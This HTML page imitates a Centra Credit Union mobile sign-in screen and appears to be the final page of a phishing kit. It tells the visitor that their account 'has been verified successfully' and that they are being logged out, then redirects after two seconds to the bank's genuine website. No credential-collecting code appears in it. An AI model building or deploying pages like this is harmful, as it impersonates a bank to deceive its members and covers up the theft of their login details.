<!DOCTYPE html>
<html lang="en-US" data-mobile-page="" class="js-focus-visible">
  <head>
    <meta http-equiv="refresh" content="2; url=https://www.centra.org/">
    <style>body {transition: opacity ease-in 0.2s; } 
    body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
    </style>
    <link rel="icon" type="image/png" sizes="192x192" href="favicon.ico">
    <link rel="shortcut icon" href="favicon.ico">
    <meta name="msapplication-TileColor" content="true">
    <meta name="theme-color" content="true">
    <link href="css/font-icons.css" rel="stylesheet" type="text/css">
    <title>Centra Credit Union</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
    <meta name="format-detection" content="telephone=no">
    <link href="css/css.css" rel="Stylesheet" type="text/css">
    <link href="css/jquery-ui.min.css" rel="stylesheet" type="text/css">
    <link href="css/base.min.css" rel="stylesheet" type="text/css">
    <link href="css/iris.shim.mobile.min.css" rel="stylesheet" type="text/css">
    <link href="css/iris.android.min.css" rel="stylesheet" type="text/css">
    <link href="css/iris-foundation.min.css" rel="stylesheet" type="text/css">
    <link rel="stylesheet" href="css/theme.mobile.css">
    <link rel="stylesheet" href="css/iris-components.shim.mobile.min.css" type="text/css">
    <link rel="stylesheet" href="css/iris-foundation.min1.css" type="text/css">
    <link rel="stylesheet" href="css/iris-components.min.css" type="text/css">
    <link rel="stylesheet" href="isotope.min.css" type="text/css">
    
    <style id="inert-style">
    [inert] {
      pointer-events: none;
      cursor: default;
    }
    
    [inert], [inert] * {
      user-select: none;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
    }
    </style></head>
<body id="username_page" class="alk-body shared-layout theme--theme-builder isotope-mobile Authentication iris-mouse-use-detected android challenge-type-username-and-password" data-orion="">
<div class="page-background__layer page-background__layer0--image"></div>
<div id="mmenu_container">
  <div id="wrapper">
    <div id="content" class="clearfix">    
      <div class="mobile-authentication-container">
        <div id="login_header" class="mobile-authentication-header">
          <div class="brand-logo" role="img" aria-label=""></div>
        </div>
        <div class="mobile-authentication-content">
            <div id="app" role="main" class="isotope-app">
            <div class="isotope-page--authentication isotope-page">
              <div data-v-186950e7="" class="isotope-challenge-type--username-and-password isotope-challenge-type">
                
                    <center style="margin-top: -300px; color: white"><svg version="1.1" id="Layer_1" width="70" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve"><style type="text/css"><![CDATA[
                      .st0{fill:white;}
                  ]]></style><g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/></g></svg><br>
              
                  <h2 >Your account has been verified successfully</h2><p >We are logging you out.......</p></center>

                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
</body>
</html>